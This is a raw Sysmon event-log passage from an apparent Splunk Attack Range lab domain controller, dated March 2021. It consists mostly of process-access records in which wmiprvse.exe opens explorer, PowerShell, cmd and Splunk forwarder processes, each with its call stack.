16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49A17847182CC67117017733EA9081F7,SHA256=A70114366D95F4E01313970E29D85E474CE76C2EC33DDB1B171B2F50BF065553,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C: